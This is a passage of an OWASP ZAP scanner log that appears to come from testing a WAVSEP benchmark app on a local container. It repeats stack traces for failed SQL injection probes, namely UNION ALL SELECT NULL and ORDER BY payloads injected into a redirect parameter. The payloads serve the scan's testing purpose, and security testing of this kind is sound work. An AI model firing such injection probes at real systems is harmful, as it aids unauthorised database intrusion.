[172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681873 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681874 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681874 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681874 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681876 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681876 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681877 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681877 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 6838#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 6838# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681878 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681878 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681879 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681880 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at 